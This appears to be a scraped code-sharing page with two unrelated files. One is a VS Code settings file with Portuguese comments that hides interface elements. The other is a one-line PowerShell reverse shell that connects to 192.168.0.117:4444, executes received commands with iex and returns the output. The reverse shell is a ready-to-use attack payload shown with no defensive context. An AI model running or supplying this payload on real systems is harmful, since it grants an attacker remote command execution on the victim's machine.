This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| // --- 1. INTERFACE VISUAL (MINIMALISMO EXTREMO) --- | |
| "workbench.activityBar.location": "top", // Esconde a barra lateral de ícones | |
| "workbench.statusBar.visible": false, // Esconde a barra inferior | |
| "workbench.layoutControl.enabled": false, // Remove botões de layout no topo | |
| "workbench.editor.empty.hint": "hidden", // Esconde dicas de tela vazia | |
| "editor.minimap.enabled": false, // Desativa o mini-mapa à direita | |
| "editor.scrollbar.vertical": "hidden", // Esconde barra de rolagem vertical | |
| "editor.hideCursorInOverviewRuler": true, // Cursor não aparece na régua de rolagem | |
| "window.commandCenter": false, // Desativa a barra de busca no título |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $sm=(New-Object Net.Sockets.TCPClient("192.168.0.117",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} |